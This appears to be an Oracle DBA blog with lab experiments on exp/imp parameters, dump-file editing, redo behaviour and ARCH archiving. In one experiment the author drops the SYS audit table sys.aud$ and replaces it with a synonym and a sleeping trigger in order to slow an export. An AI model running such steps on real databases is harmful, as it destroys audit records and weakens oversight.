ALL_APPLY_CONFLICT_COLUMNS     T_MYTEST(6, 7, 8)

ALL_APPLY_DML_HANDLERS         T_MYTEST(7, 8, 9)

ALL_APPLY_ERROR                T_MYTEST(8, 9, 10)

ALL_APPLY_KEY_COLUMNS          T_MYTEST(9, 10, 11)

 

SQL> conn yp/yaping

Connected.

SQL> create or replace type t_mytest as varray(10) of number;

  2  /

Type created.

SQL> create table t2(name varchar2(30),member t_mytest);

Table created.

 

$exp test/test tables=(t2) file=t2.dmp

 

Before modify the dump file.

$imp yp/yaping fromuser=test file=t2.dmp ignore=y

 

Import: Release 9.2.0.4.0 – Production on Mon Jun 11 04:00:19 2007

 

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

 

 

Connected to: Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

With the Partitioning, OLAP and Oracle Data Mining options

JServer Release 9.2.0.4.0 – Production

 

Export file created by EXPORT:V09.02.00 via conventional path

 

Warning: the objects were exported by TEST, not by you

 

import done in US7ASCII character set and AL16UTF16 NCHAR character set

. importing TEST’s objects into YP

IMP-00061: Warning: Object type “YP”.”T_MYTEST” already exists with a different identifier

 “CREATE TYPE “T_MYTEST” TIMESTAMP ‘2007-06-11:02:43:07’ OID ‘3291809FE886C60″

 “9E040007F01002BAC’   as varray(10) of number;”

IMP-00063: Warning: Skipping table “YP”.”T2″ because object type “YP”.”T_MYTEST” cannot be created or has different identifier

Import terminated successfully with warnings.

 

Then we modify the t2.dmp file. We open it with vi, locate the following contents, and remove the portions highlighted in red.

 

TABLE “T2”

BEGINTYPE “T_MYTEST” “3291809FE886C609E040007F01002BAC” “2186F75D29F3ED2CB659AE4D0AEE92E6C7”

“^@^@^@^@^^&^A^@^A^@^A)^@^@^@^@^@^S^\^@^@^@^]^@^@^@

^C*^F^@<81>^@^G

CREATE TYPE

媒每^^@CREATE TYPE “T_MYTEST” TIMESTAMP ‘2007-06-11:02:43:07’ OID ‘3291809FE886C609E040007F01002BAC’ ^A^@ ^Y^@ as varray(10) of numb;^@^@

GRANT EXECUTE ON “T_MYTEST” TO “YP”

ENDTYPE

CREATE TABLE “T2” (“NAME” VARCHAR2(30), “MEMBER” “T_MYTEST”)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “USERS” LOGGING NOCOMPRESS

 

 

After modify this file and save it, we import it again.

 

$ imp yp/yaping fromuser=test file=t2.dmp ignore=y

 

Import: Release 9.2.0.4.0 – Production on Mon Jun 11 04:02:39 2007

 

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

 

 

Connected to: Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

With the Partitioning, OLAP and Oracle Data Mining options

JServer Release 9.2.0.4.0 – Production

 

Export file created by EXPORT:V09.02.00 via conventional path

 

Warning: the objects were exported by TEST, not by you

 

import done in US7ASCII character set and AL16UTF16 NCHAR character set

. importing TEST’s objects into YP

. . importing table                           “T2”         99 rows imported

Import terminated successfully without warnings.

 

 

This problem can also be resolved by set TOID_NOVALIDATE parameter.

 

$ imp yp/yaping fromuser=test touser=yp file=t2.dmp ignore=y TOID_NOVALIDATE=(t_mytest)

 

Import: Release 9.2.0.4.0 – Production on Mon Jun 11 04:04:16 2007

 

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

 

 

Connected to: Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

With the Partitioning, OLAP and Oracle Data Mining options

JServer Release 9.2.0.4.0 – Production

 

Export file created by EXPORT:V09.02.00 via conventional path

 

Warning: the objects were exported by TEST, not by you

 

import done in US7ASCII character set and AL16UTF16 NCHAR character set

. . skipping TOID validation on type YP.T_MYTEST

. . importing table                           “T2”         99 rows imported

Import terminated successfully without warnings.

 

 

 

- Buffer, commit and consistent parameters

The default buffer size is too small; we need to increase it for efficiency. The buffer and commit parameters are usually used together, but we should bear in mind some side effects.

When we set commit=y, if the import process aborts, the table's data may be left in an unknown state, and it is hard to decide where to restart. Before using a feature that can lead to such ambiguity, we must first be familiar with the application.

The commit parameter does not take effect for some types, such as LOB, LONG, REF, etc.; for these, data is committed every row.

Before setting consistent=y, we might consider whether it makes sense to export tables in several runs, putting the tables that need to be mutually consistent into the same export, separated from the other tables.

 

 

- Trace parameter

If you want to know which SQL statements are performed when exp/imp runs, there is an easy method: specify the parameter trace=y, which is equivalent to setting sql_trace and timed_statistics within the session. Older exp/imp releases may not have this parameter.

 

 

- Buffer parameter

If the buffer parameter is specified, where is the buffer allocated from — the database or the OS?

 

We use one trigger to record the session’s statistics about memory allocation.

create or replace trigger trigger_logoff

before logoff on database

–before logoff on test.schema

declare

  v_program varchar2(48);

  v_sid number;

  v_paddr RAW(4);

begin

 

if user=’TEST’ then

 

   select sid,PROGRAM,paddr into v_sid,v_program,v_paddr from v$session where AUDSID=sys_context(‘userenv’,’sessionid’);

 

   insert into sys.sesstat select sid,name,value,sysdate,v_program from v$mystat a,v$statname b where a.STATISTIC#=b.STATISTIC# and (name like ‘%uga%’ or name like ‘%pga%’ or name = ‘user commits’);

 

   insert into procmem select v_sid,spid,PROGRAM,PGA_USED_MEM,PGA_ALLOC_MEM,PGA_FREEABLE_MEM,PGA_MAX_MEM,sysdate from v$process where addr=v_paddr;

 

end if;

 

exception

  when others then

       dbms_system.KSDWRT(2,sqlerrm);

 

end;

/

 

We use one demo table, its size is a little more than 250M.

SQL> analyze table test.t1 compute statistics;

 Table analyzed.

 

SQL> select OWNER,AVG_ROW_LEN,NUM_ROWS from dba_tables where table_name=’T1′;

 OWNER                          AVG_ROW_LEN   NUM_ROWS

—————————— ———– ———-

TEST                                  6016      44352

 

SQL> select 6016*44352/1024/1024 from dual;

 6016*44352/1024/1024

——————–

          254.460938

 

The following results show session memory allocation with different buffer value, default buffer value and 20M buffer.

       SID NAME                          VALUE DT                  PROGRAM

———- ———————— ———- ——————- ————————————————       

         9 session uga memory           158356 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)  –imp test/test  file=t1.dmp trace=y log=3.log ignore=y

         9 session uga memory max       162756 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory           561736 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory max       561736 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)

        

         9 session uga memory           132932 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)  –imp test/test  file=t1.dmp trace=y log=4.log ignore=y buffer=20971520

         9 session uga memory max       141108 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory           408836 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory max       408836 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)

        

 

According to the following result we can confirm that the buffer value took effect.

       SID NAME                                VALUE DT                  PROGRAM

———- —————————— ———- ——————- ——————————

        14 user commits                            1 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3) –imp test/test  file=t1.dmp trace=y log=p1.log ignore=y buffer=20971520

        14 session uga memory                 134040 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

        14 session uga memory max             138440 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

        14 session pga memory                 425860 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

        14 session pga memory max             425860 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

 

         9 user commits                           13 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3) –imp test/test  file=t1.dmp trace=y log=p1.log ignore=y buffer=20971520 commit=y

         9 session uga memory                 165040 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

         9 session uga memory max             186384 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory                 572832 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory max             572832 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

 

 

 SID       SPID PROGRAM                        PGA_USED_MEM PGA_ALLOC_MEM PGA_FREEABLE_MEM PGA_MAX_MEM DT

—- ———- —————————— ———— ————- —————- ———– ——————-

  14       4500 oracle@TCLUX3245 (TNS V1-V3)         435321        480213                0      480213 2007-12-29 14:21:29

   9       4884 oracle@TCLUX3245 (TNS V1-V3)         562997        627185                0      627185 2007-12-29 14:52:04

 

From the above result, we can conclude that the memory specified by the buffer parameter is not allocated from the database. Now we observe the processes with the ps command.

The parent-child process relationship clearly shows that the memory for the buffer parameter is allocated by the imp/exp command itself.

———————————————————————

USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND

 

root     31739  0.0  0.1  6860 1080 ?        S    Dec27   0:00  \_ sshd: oracle [priv]

oracle   31741  0.0  0.1  7020 1204 ?        S    Dec27   0:01  |   \_ sshd: oracle@pts/7

oracle   31744  0.0  0.1  4404 1196 pts/7    S    Dec27   0:00  |       \_ -bash

oracle    5049  7.7  2.5 33508 25492 pts/7   S    15:32   0:02  |           \_ imp           file=t1.dmp trace=y log=p1.log ig

oracle    5050 12.3  6.4 269728 65472 ?      S    15:32   0:04  |               \_ oracleO02DMS0 (DESCRIPTION=(LOCAL=YES)(ADDR

 

–imp test/test  file=t1.dmp trace=y log=p1.log ignore=y buffer=20971520 commit=y

–buffer=20971520 =20M

–25492 KB

 

root     31739  0.0  0.1  6860 1080 ?        S    Dec27   0:00  \_ sshd: oracle [priv]

oracle   31741  0.0  0.1  7020 1204 ?        S    Dec27   0:01  |   \_ sshd: oracle@pts/7

oracle   31744  0.0  0.1  4404 1200 pts/7    S    Dec27   0:00  |       \_ -bash

oracle    5125  1.3  0.4 13028 4988 pts/7    S    16:08   0:06  |           \_ imp           file=t1.dmp trace=y log=p1.log ig

oracle    5126  2.1  6.4 269712 65772 ?      S    16:08   0:09  |               \_ oracleO02DMS0 (DESCRIPTION=(LOCAL=YES)(ADDR

 

–imp test/test  file=t1.dmp trace=y log=p1.log ignore=y

 

———————————————————————

 

 

- Unique constraint violated

A unique constraint may be enforced by a unique index or a non-unique index, but the two index types validate the constraint at different points.

Unique index: first generate redo and undo, then modify the data blocks containing the DML rows, then validate the constraint; if it passes, generate redo and undo for the index entries and modify them; if it fails, additional redo is generated for the validation failure and an implicit rollback is performed against the table.

Non-unique index: first generate redo and undo, then modify the data blocks containing the DML rows, generate redo and undo for the index entries and modify them, then validate the constraint; if it fails, additional redo is generated for the validation failure and an implicit rollback is performed against the index, then against the table.

The import utility will be extremely costly if data being imported fail a unique constraint. As is the case with standard insert operations the redo cost for failed rows via imp is influenced by the type of index used to enforce the unique constraint. Aside from the index-type influence the number of failed rows per batch violating a unique constraint greatly impacts the redo generated. The buffer parameter will control the number per batch.

 

I illuminate it with the following experiment.

test@CHEN>create table t1(id number);

Table created.

 

test@CHEN>create table t2(id number);

Table created.

 

test@CHEN>alter table t1 add constraint t1_pk primary key(id);

Table altered.

 

test@CHEN>create index idx_t2_id on t2(id);

Index created.

 

test@CHEN>alter table t2 add constraint t2_pk primary key(id) using index;

Table altered.

 

test@CHEN>insert into t1 select rownum from dual connect by level<16;

15 rows created.

 

test@CHEN>insert into t2 select rownum from dual connect by level<16;

15 rows created.

 

test@CHEN>commit;

Commit complete.

 

test@CHEN>!exp test/test tables=(t1,t2) file=t1_t2.dmp silent=y

About to export specified tables via Conventional Path …

. . exporting table                             T1         15 rows exported

. . exporting table                             T2         15 rows exported

Export terminated successfully without warnings.

 

test@CHEN>delete from t2 where id<6 or id>10;

10 rows deleted.

 

test@CHEN>delete from t1 where id<6 or id>10;

10 rows deleted.

 

test@CHEN>commit;

Commit complete.

 

test@CHEN>!imp test/test file=t1_t2.dmp ignore=y silent=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

. . importing table                           “T1”

IMP-00019: row rejected due to ORACLE error 1

IMP-00003: ORACLE error 1 encountered

. . importing table                           “T2”

IMP-00019: row rejected due to ORACLE error 1

IMP-00003: ORACLE error 1 encountered

ORA-00001: unique constraint (TEST.T2_PK) violated

Column 1 6

 

By examining the redo log, we can see that Oracle performed the following actions.

T1

STEP 1

Multiple rows insert (1..15), controlled by the buffer parameter

 

STEP 2

Index leaf rows insert through array, stop when value=6, then clean

 

STEP 3

Multiple rows delete(1..15), all rows insert just now

 

STEP 4

Single row insert value 1, then insert index leaf row

Repeat above actions with row value from 2 to 5

 

STEP 5

Multiple rows insert(7..15), skip the value last failed, then start from there

 

STEP 6

Multiple rows delete(7..15)

 

STEP 7

Repeat STEP 5 & 6, until value is 10

 

STEP 8

Multiple rows insert(11..15)

 

STEP 9

Index leaf rows insert through array

 

STEP 10

Mark this transaction committed

 

T2

STEP 1

Multiple rows insert (1..15), controlled by the buffer parameter

 

STEP 2

Index leaf row insert, start from value 1 to 5

 

STEP 3

Index leaf row insert, value=6, validate failed, then clean all leaf rows

 

STEP 4

Multiple rows delete(1..15), all rows insert just now

 

STEP 5

Single row insert value 1, then insert index leaf row

Repeat above actions with row value from 2 to 5

 

STEP 6

Multiple rows insert(7..15), skip the value last failed, then start from there

Index leaf row insert, value=7, validate failed, then clean

 

STEP 7

Repeat STEP 6 until value is 10

 

STEP 8

Perform STEP 1 & 2

 

STEP 9

Mark this transaction committed

 

From the above result we can see that a large amount of redo is generated if an import encounters unique-constraint violations.

 

 

- Can we export a table and import it into another table?

 

Maybe.

 

[oracle@chen ~]$ exp test/test tables=t2 file=t2.dmp silent=y

About to export specified tables via Conventional Path …

. . exporting table                             T2         10 rows exported

Export terminated successfully without warnings.

 

Edit dump file t2.dmp with vi tools, change all T2 words to T8 in the file, then save it.

 

[oracle@chen ~]$ vi t2.dmp

TABLE “T2”

CREATE TABLE “T2” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING NOCOMPRESS

INSERT INTO “T2” (“ID”) VALUES (:1)

^A^@^B^@^V^@^@^@^@^@^B^@Ã^B^@^@^B^@Ã^C^@^@^B^@Ã^D^@^@^B^@Ã^E^@^@^B^@Ã^F^@^@^B^@Ã^G^@^@^B^@Ã^H^@^@^B^@à ^@^@^B^@Ã

^@^@^B^@Ã^K^@^@ÿÿ

CREATE INDEX “IDX_T2_ID” ON “T2” (“ID” )  PCTFREE 10 INITRANS 2 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING

 

[oracle@chen ~]$ strings t2.dmp

EXPORT:V09.02.00

UTEST

RTABLES

8192

                                        Fri Jun 27 0:34:44 2008t2.dmp

#C##

#C##

+08:00

BYTE

INTERPRETED

TABLE “T8”

CREATE TABLE “T8” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING NOCOMPRESS

INSERT INTO “T8” (“ID”) VALUES (:1)

CREATE INDEX “IDX_T8_ID” ON “T8” (“ID” )  PCTFREE 10 INITRANS 2 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING

EXIT

EXIT

 

[oracle@chen ~]$ imp test/test file=t2.dmp silent=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

. . importing table                           “T8”         10 rows imported

Import terminated successfully without warnings.

 

The above method is very dangerous; there is an easier approach. We simply create table T8 with the same structure first, then create a synonym named T2 that refers to T8, and import the data.

 

 

- Consistent parameter

 

Prepare for data.

Session 1

test@CHEN>create table t1 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create table t2 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create table t3 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create table t4 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

We consider how to slow down export progress.

Session 2

sys@CHEN>AUDIT SELECT ON test.t1 WHENEVER SUCCESSFUL;

Audit succeeded.

 

sys@CHEN>create or replace trigger after_audit

  2  after insert or update on sys.aud$

  3  begin

  4    dbms_lock.sleep(60);

  5  end;

  6  /

create or replace trigger after_audit

                          *

ERROR at line 1:

ORA-04089: cannot create triggers on objects owned by SYS

 

sys@CHEN>create table system.aud$ as select * from sys.aud$ where 1=2;

Table created.

 

sys@TEST>drop table sys.aud$;

Table dropped.

 

sys@CHEN>create synonym aud$ for system.aud$;

Synonym created.

 

sys@CHEN>create or replace trigger after_audit

  2    after insert or update on system.aud$

  3    begin

  4      dbms_lock.sleep(60);

  5    end;

  6  /

Trigger created.

 

Export with consistent=y parameter

Session 2

sys@CHEN>!exp test/test file=test.dmp CONSISTENT=y trace=y silent=y

About to export specified users …

. exporting pre-schema procedural objects and actions

. exporting foreign function library names for user TEST

. exporting PUBLIC type synonyms

. exporting private type synonyms

. exporting object type definitions for user TEST

About to export TEST’s objects …

. exporting database links

. exporting sequence numbers

. exporting cluster definitions

. about to export TEST’s tables via Conventional Path …

. . exporting table                             T1          4 rows exported –hold on 240 seconds

. . exporting table                             T2          4 rows exported

. . exporting table                             T3          4 rows exported

. . exporting table                             T4

EXP-00056: ORACLE error 942 encountered

ORA-00942: table or view does not exist

. exporting synonyms

. exporting views

. exporting stored procedures

. exporting operators

. exporting referential integrity constraints

. exporting triggers

. exporting indextypes

. exporting bitmap, functional and extensible indexes

. exporting posttables actions

. exporting materialized views

. exporting snapshot logs

. exporting job queues

. exporting refresh groups and children

. exporting dimensions

. exporting post-schema procedural objects and actions

. exporting statistics

Export terminated successfully with warnings.

 

After submitting the exp command in session 2, run the following SQL in another session immediately.

Session 1

test@CHEN>@case1

test@CHEN>insert into t1 values(-1);

1 row created.

 

test@CHEN>insert into t2 values(-1);

1 row created.

 

test@CHEN>alter table t3 add a varchar2(1) default ‘Y’;

Table altered.

 

test@CHEN>drop table t4;

Table dropped.

 

test@CHEN>create table t5 as select * from t2;

Table created.

 

test@CHEN>

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return ‘consistent=y:’||p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

Check the exported data.

Session 2

sys@CHEN>!imp test/test file=test.dmp rows=n show=y silent=y full=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

 “BEGIN 

 “CREATE TABLE “T3” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS “

 “255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” “

 “LOGGING NOCOMPRESS”

. . skipping table “T3”

 

 “CREATE TABLE “T4” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS “

 “255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” “

 “LOGGING NOCOMPRESS”

. . skipping table “T4”

 

“CREATE function f_test(p_str varchar2)”

   return varchar2 as”

 “begin”

   return p_str;”

   exception”

   when others then”

        return ‘ERROR’;”

 “end;”

Import terminated successfully without warnings.

 

From the above output, we can see that the definition of the dropped table is still exported, but it contains no data. Even though the table's structure changed, the previous definition is exported; new objects are not exported.

 

Export with consistent=n parameter

 

Session 2

sys@CHEN>!exp test/test file=test.dmp consistent=n trace=y silent=y

About to export specified users …

. exporting pre-schema procedural objects and actions

. exporting foreign function library names for user TEST

. exporting PUBLIC type synonyms

. exporting private type synonyms

. exporting object type definitions for user TEST

About to export TEST’s objects …

. exporting database links

. exporting sequence numbers

. exporting cluster definitions

. about to export TEST’s tables via Conventional Path …

. . exporting table                             T1          4 rows exported — hold on

. . exporting table                             T2          5 rows exported

. . exporting table                             T3          4 rows exported

. . exporting table                             T4

EXP-00007: dictionary shows no columns for TEST.T4

. exporting synonyms

. exporting views

. exporting stored procedures

. exporting operators

. exporting referential integrity constraints

. exporting triggers

. exporting indextypes

. exporting bitmap, functional and extensible indexes

. exporting posttables actions

. exporting materialized views

. exporting snapshot logs

. exporting job queues

. exporting refresh groups and children

. exporting dimensions

. exporting post-schema procedural objects and actions

. exporting statistics Export terminated successfully with warnings.

 

After submitting the exp command in session 2, run the following SQL in another session immediately.

Session 1

Tables t1, t2, t3, t4 have been recreated before run the above export.

test@CHEN>@case2

test@CHEN>insert into t1 values(-1);

1 row created.

 

test@CHEN>insert into t2 values(-1);

1 row created.

 

test@CHEN>alter table t3 add a varchar2(1) default ‘Y’;

Table altered.

 

test@CHEN>drop table t4;

Table dropped.

 

test@CHEN>

test@CHEN>create table t5 as select * from t2;

Table created.

 

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return ‘consistent=n:’||p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

Check the exported data.

Session 2

sys@CHEN>!imp test/test file=test.dmp rows=n show=y silent=y full=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

 “BEGIN 

 “CREATE TABLE “T3” (“ID” NUMBER, “A” VARCHAR2(1))  PCTFREE 10 PCTUSED 40 INI”

 “TRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) T”

 “ABLESPACE “TEST” LOGGING NOCOMPRESS”

 ” ALTER TABLE “T3” MODIFY (“A” DEFAULT ‘Y’)”

. . skipping table “T3”

“CREATE function f_test(p_str varchar2)”

   return varchar2 as”

 “begin”

   return ‘consistent=n:’||p_str;”

   exception”

   when others then”

        return ‘ERROR’;”

 “end;”

Import terminated successfully without warnings.

 

We can see that the dropped table is gone, and changed objects are exported with the definition and data as of the time they are read; new objects are still not included.

 

Export with object_consistent=y parameter

 

Session 2

sys@CHEN>!exp test/test file=test.dmp OBJECT_CONSISTENT=y trace=y silent=y

About to export specified users …

. exporting pre-schema procedural objects and actions

. exporting foreign function library names for user TEST

. exporting PUBLIC type synonyms

. exporting private type synonyms

. exporting object type definitions for user TEST

About to export TEST’s objects …

. exporting database links

. exporting sequence numbers

. exporting cluster definitions

. about to export TEST’s tables via Conventional Path …

. . exporting table                             T1          4 rows exported –hold on

. . exporting table                             T2          5 rows exported

. . exporting table                             T3          4 rows exported

. . exporting table                             T4

EXP-00007: dictionary shows no columns for TEST.T4

. exporting synonyms

. exporting views

. exporting stored procedures

. exporting operators

. exporting referential integrity constraints

. exporting triggers

. exporting indextypes

. exporting bitmap, functional and extensible indexes

. exporting posttables actions

. exporting materialized views

. exporting snapshot logs

. exporting job queues

. exporting refresh groups and children

. exporting dimensions

. exporting post-schema procedural objects and actions

. exporting statistics

Export terminated successfully with warnings.

 

After submitting the exp command in session 2, run the following SQL in another session immediately.

 

Session 1

Tables t1, t2, t3, t4 have been recreated before run the above export.

test@CHEN>@case3

test@CHEN>insert into t1 values(-1);

1 row created.

 

test@CHEN>insert into t2 values(-1);

1 row created.

 

test@CHEN>alter table t3 add a varchar2(1) default ‘Y’;

Table altered.

 

test@CHEN>drop table t4;

Table dropped.

 

test@CHEN>

test@CHEN>create table t5 as select * from t2;

Table created.

 

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return ‘object_consistent=y:’||p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

Check the exported data.

Session 2

sys@CHEN>!imp test/test file=test.dmp rows=n show=y silent=y full=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

 “BEGIN 

 “CREATE TABLE “T3” (“ID” NUMBER, “A” VARCHAR2(1))  PCTFREE 10 PCTUSED 40 INI”

 “TRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) T”

 “ABLESPACE “TEST” LOGGING NOCOMPRESS”

 ” ALTER TABLE “T3” MODIFY (“A” DEFAULT ‘Y’)”

. . skipping table “T3”

…”

 “CREATE function f_test(p_str varchar2)”

   return varchar2 as”

 “begin”

   return ‘object_consistent=y:’||p_str;”

   exception”

   when others then”

        return ‘ERROR’;”

 “end;”

Import terminated successfully without warnings.

 

 

From the above results, it seems that the list of tables to export is obtained at the beginning of the export.

 

 

 

- Others

There’s one tool which can extract DDL statements from dump file. Refer to http://www.ddlwizard.com/.

 

ARCH relevant

Filed under: Oracle — Yaping @ 4:29 am
Tags:

Prior to Oracle 10g, when the ARCH process needs to archive a redo log, it first builds a list of archive destinations. Once this list is complete, the ARCH process reads a 1 MB chunk of the redo log data to be archived. The chunk size is controlled by a hidden parameter called _log_archive_buffer_size; its default value is 2048 redo log blocks, and since a redo log block is 512 bytes, the chunk size is exactly 1 MB. This 1 MB chunk is then sent to the first destination in the list; after that write completes, the same 1 MB chunk is sent to the second destination, and so on until the chunk has been written to all destinations. Next, the ARCH process reads the next 1 MB chunk of the redo log, repeating these actions until the whole redo log has been written to all destinations. So archiving is only as fast as the slowest destination.

 

So what will happen if the writing progress is slow or dead?

In some situations the network is slow or the server is under heavy load, which can make the archiving progress very slow. If a redo log has not been completely archived, the database can still switch to the next redo log file as long as redo log groups are available. It is possible for the log writer process to cycle through all available online redo log groups and attempt to reuse a redo log file that has not yet been completely archived; at that point the database is suspended.

If the ARCH process gets no response from an archive destination — perhaps because the network or the server is dead — the result differs from the slow-progress case. The unavailable destination is simply closed for archiving, and the ARCH process continues archiving to the available destinations. The OPTIONAL and MANDATORY attributes merely control whether an online redo log file can be reused when its archiving to that destination has not completed.

 

We should pay extra attention when archive destinations are reached over the network (NFS or a standby). If data is transmitted over a slow network, no error is raised and the destination is not closed; transmission continues, just very slowly. Ultimately the database will be suspended for lack of available redo log groups.

 

Since Oracle 9.2.0.5, it introduces one parameter called _LOG_ARCHIVE_CALLOUT, allow the DBA to change the default behavior:

_LOG_ARCHIVE_CALLOUT=’LOCAL_FIRST=TRUE’

If this parameter is set and the standby uses the ARCH process to archive logs, then the ARCH process archives to the local destinations first. Once the redo log has been completely and successfully archived to at least one local destination, it is then transmitted to the remote destination. This is the default behavior since Oracle 10g Release 1.

 

 

@>@getPar

Enter value for parameter: _log_archive_buffer_size

old   6: ksppinm like lower(‘%&parameter%’)

new   6: ksppinm like lower(‘%_log_archive_buffer_size%’)

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_log_archive_buffer_size                 2048                                     Size of each archival buffer in log file

                                                                                   Blocks

The max value is 2048 within Oracle 9i under Linux.

 

[oracle@chen ~]$ ps -ef|grep arc

oracle   12148     1  0 03:25 ?        00:00:00 ora_arc0_chen

oracle   12150     1  0 03:25 ?        00:00:00 ora_arc1_chen

oracle   12529 12495  1 04:34 pts/9    00:00:00 grep arc

 

[oracle@chen ~]$ strace -p 12148 -o ora_arc0_chen.log &

[1] 12532

 

[oracle@chen ~]$ strace -p 12150 -o ora_arc1_chen.log &

[2] 12559

 

@>alter system switch logfile;

System altered.          

 

We can find the similar following records in the trace files.

… …

open(“/u03/oradata/9208/chen/redo02.log”, O_RDONLY|O_DIRECT|O_LARGEFILE) = 16

… …

open(“/u03/oradata/arch/1_329.dbf”, O_RDWR|O_SYNC|O_DIRECT|O_LARGEFILE) = 18

… …

pread(16, “I\1\1c\241\201&\270\326 \t \t\200″…, 1048576, 512) = 1048576

… …

pwrite(18, “I\1\1\10M\241\201&D\212\233                “…, 1048576, 1049088) = 1048576

… …

 

 

@>@getPar

Enter value for parameter: _log_archive_callout

old   6: ksppinm like lower(‘%&parameter%’)

new   6: ksppinm like lower(‘%_log_archive_callout%’)

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_log_archive_callout          

 

 

Logs gap resolution

Since Oracle 9i Release 1, automatic gap resolution is implemented during log transport processing. As the LGWR or ARCH process begins to send redo over to the standby, the sequence number of the log being archived is compared to the last sequence received by the RFS process on the standby. If the RFS process detects that the archive log being received is greater than the last sequence received plus one, then the RFS will piggyback a request to the primary to send the missing archive logs.

 

Starting in Oracle Release 2, automatic gap resolution has been enhanced. In addition to the above, the ARCH process on the primary database polls all standby databases every minute to see if there is a gap in the sequence of archived redo logs. If a gap is detected then the ARCH process sends the missing archived redo log files to the standby databases that reported the gap. Once the gap is resolved, the LGWR process is notified that the site is up to date.

 

If the MRP process finds that the archived log is missing or is corrupt on standby, FAL is called to resolve the gap or obtain a new copy.  Since MRP has no direct communications link with the primary, it must use the FAL_SERVER and FAL_CLIENT initialization parameters to resolve the gap. Both of these parameters must be set in the standby site. The two parameters are defined as:

 

FAL_SERVER: An OracleNet service name that exist in the standby tnsnames.ora file that points to the primary database listener.

FAL_CLIENT: An OracleNet service name that exist in the primary tnsnames.ora file that points to the standby database listener.

 

Once MRP needs to resolve a gap it uses the value from FAL_SERVER to call the primary database. Once communication with the primary has been established, MRP passes the FAL_CLIENT value to the primary ARCH process. The primary ARCH process locates the remote archive destination with the corresponding service name and ships the missing archived redo logs.

 

 

Archive process

When we take a database backup, we generally archive the current redo log first; after backing up the datafiles, we archive the current redo log again. We can achieve this with either alter system switch logfile or alter system archive log current, but they differ. The switch command fires a background process to archive the log and returns to the command line immediately — so we can continue with the next tasks, but the archive task may not yet be complete. The archive command, by contrast, makes the user's own process archive the log and does not return to the command line until archiving completes. So we should consider using the archive command to archive the current log when writing backup scripts.

 

We can use the following experiment to confirm it.

 

@>@myid

